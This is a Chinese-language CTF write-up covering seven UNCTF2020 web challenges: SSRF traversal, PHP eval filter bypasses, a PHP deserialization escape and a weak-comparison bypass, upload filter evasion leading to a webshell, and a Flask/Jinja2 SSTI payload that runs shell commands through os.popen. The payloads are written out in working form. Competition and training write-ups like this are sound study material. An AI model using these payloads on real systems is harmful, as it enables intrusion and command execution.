UNCTF2020 | Web Wp
文章目錄
- Web
- 0x01:easy_ssrf
- 0x02:babyeval
- 0x03:ezphp
- 0x04:easy_upload
- 0x05:L0vephp
- 0x06:easyflask
- 0x07:easyunserialize
- 總結
Web
0x01:easy_ssrf
代碼很簡單,參數中要有unctf.com,而且過濾了php|file|zip|bzip|zlib|base|data,導致很多協議用不了,查了查資料發現涉及到SSRF file_get_contents函數都是利用的file協議等,一開始也沒思路要怎么繞過去。
然后查了一篇師傅的博客記載了一個SSRF的一個黑魔法:
當PHP的 file_get_contents() 函數在遇到不認識的偽協議頭時候會將偽協議頭當做文件夾,造成目錄穿越漏洞,這時候只需不斷往上跳轉目錄即可讀到根目錄的文件。這個方法可以在SSRF的眾多協議被ban的情況下來進行讀取文件
發現確實可以造成目錄穿越,直接讀取下flag
0x02:babyeval
過濾了帶括號的函數,可以使用echo進行輸出內容,通過include包含flag.php,再輸出變量即可(感覺是非預期,因為ob_start函數沒有用到)
payload:
?a=include "flag.php";echo $flag;ob_start([string output_callback])- 打開輸出緩沖區,所有的輸出信息不在直接發送到瀏覽器,而是保存在輸出緩沖區里面,可選得回調函數用于處理輸出結果信息。
這道題設置的是輸出信息中不能存在flag,所以可以利用編碼繞過
?a=echo `base64 flag.php`;
也可以通過include+偽協議去讀取
0x03:ezphp
bool類型的true跟任意字符串可以弱類型相等。因此我們可以構造bool類型的序列化數據 ,無論比較的值是什么,結果都為true
payload:
<?php error_reporting(0); $shy=''; $shy=array("username"=>1,"password"=>1); echo var_dump($shy); echo var_dump(serialize($shy));$shy=''; $shy=array("username"=>true,"password"=>true); echo var_dump($shy); echo var_dump(serialize($shy)); ?>0x04:easy_upload
上傳一個php文件,發現過濾了以下內容
查了資料,發現是De1CTF2020的原題,既然過濾了ph,可以使用換行進行繞過
還過濾了>,可以使用
上傳進去,蟻劍連接之后便可以在根目錄中發現flag
0x05:L0vephp
提示是查看頁面源碼
一開始也不知道是什么編碼,查了查字資料發現是base85(也稱為Ascii85)
可以參考一下
https://www.cnblogs.com/0yst3r-2046/p/11962942.html
在線解一下,得到
提示讀取一下源碼,嘗試一下偽協議讀取,發現
發現被過濾了,再試試其他方法,發現換成以下兩種都可以
解密得到
得到1nD3x.php,得到以下源碼
<?php error_reporting(0); show_source(__FILE__); $code=$_REQUEST['code'];$_=array('@','\~','\^','\&','\?','\<','\>','\*','\`','\+','\-','\'','\"','\\\\','\/'); $__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open'); $blacklist1 = array_merge($_); $blacklist2 = array_merge($__);if (strlen($code)>16){die('Too long'); }foreach ($blacklist1 as $blacklisted) { if (preg_match ('/' . $blacklisted . '/m', $code)) { die('WTF???'); } } foreach ($blacklist2 as $blackitem) {if (preg_match ('/' . $blackitem . '/im', $code)) {die('Sry,try again');} }@eval($code); ?>之前無命令進行構造,長度沒有限制的這么短,而且這道題過濾了很多,之前的異或什么的都走不通,查資料看了P神的這篇文章,發現了新的思路,真的是tttttql
eval長度限制繞過 && PHP5.6新特性
按照P神的payload即可獲取到flag,有空要仔細研究一下。
0x06:easyflask
一看名字就猜測是不是ssti,進去之后需要先以admin用戶登陸進去,發現存在login和register路由,以admin用戶注冊一個賬號即可獲取到/secret_route_you_do_not_know路由
在該路由下存在ssti漏洞,但是過濾以下字符
' " [ ] _可以使用|attr和request.args.xx來繞過下劃線和引號,request.args存儲著請求參數以及其值的字典,接下來就是構造payload即可
{{()|attr(request.args.class)|attr(request.args.bases)|attr(request.args.subclasses)()|attr(request.args.a)(117)|attr(request.args.b)|attr(request.args.c)|attr(request.args.d)(request.args.e)(request.args.f)|attr(request.args.g)()}}&class=__class__&bases=__base__&subclasses=__subclasses__&a=__getitem__&b=__init__&c=__globals__&d=get&e=popen&f=cat flag.txt&g=read0x07:easyunserialize
先拉到本地測試一下,修改一下源碼,讓結果回顯出來
觀察代碼也很簡單,用戶名沒有限制,密碼必須為easy,才可以得到flag,就先正常反序列化一個這樣的payload
其中";s:8:"password";s:4:"easy";}是29個字符,下面就是一個數學問題了,過濾后字符變多了四個,把";s:8:"password";s:4:"easy";}給擠出去,閉合之前的值1即可
strlen(challenge(9)*n+29)=strlen(easychallenge(13)*n) 9*n+29=13*n 4n=29+3 n=>8多出三個字符,前面肯定是不能添加的,所以可以放在最后面,根據反序列化的特點超出的部分并不會被反序列化成功,所以不會產生任何影響,payload如下:
?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}shy總結
還有幾道題當時沒做出來,等這幾天事忙了完,再回頭了做下!
總結
以上是生活随笔為你收集整理的UNCTF2020 | Web Wp的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Python Pickle反序列化漏洞
- 下一篇: 一周刷题记录 | WebMisc